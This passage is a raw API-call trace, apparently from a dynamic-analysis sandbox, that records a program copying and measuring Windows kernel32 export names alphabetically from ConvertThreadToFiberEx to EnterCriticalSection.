lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.717] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.717] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.717] lstrlenA (lpString="COPYFILEA") returned 9 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.717] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.717] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.717] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.717] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.717] lstrlenA (lpString="COPYFILEW") returned 9 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.717] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.717] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.717] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.717] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.717] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.718] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.718] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.718] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.718] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.718] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.718] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.718] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.718] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.718] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.718] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.718] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.718] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.718] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.718] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.718] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.718] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.718] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.718] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.718] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.719] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.719] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.719] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.719] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.719] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.719] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.719] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.719] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.719] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.719] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.719] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.719] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.719] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.719] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.719] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.719] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.719] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.719] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.719] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.719] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.720] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.720] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.720] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.720] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.720] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.720] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.720] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.720] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.720] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.720] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.720] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.720] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.720] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.720] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.720] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.720] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.720] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.720] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.720] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.721] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.721] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.721] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.721] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.721] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.721] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.721] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.721] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.721] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.721] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.721] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.721] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.721] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.721] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.721] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.721] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.721] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.721] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.721] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.722] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.722] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.722] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.722] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.722] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.722] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.722] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.722] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.722] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.722] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.722] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.722] lstrlenA (lpString="DELETEATOM") returned 10 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.722] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.722] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.722] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.722] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.722] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.722] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.722] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.722] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.723] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.723] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.723] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.723] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.723] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.723] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.723] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.723] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.723] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.723] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.723] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.723] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.723] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.723] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.723] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.723] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.723] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.723] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.723] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.724] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.724] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.724] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.724] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.724] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: 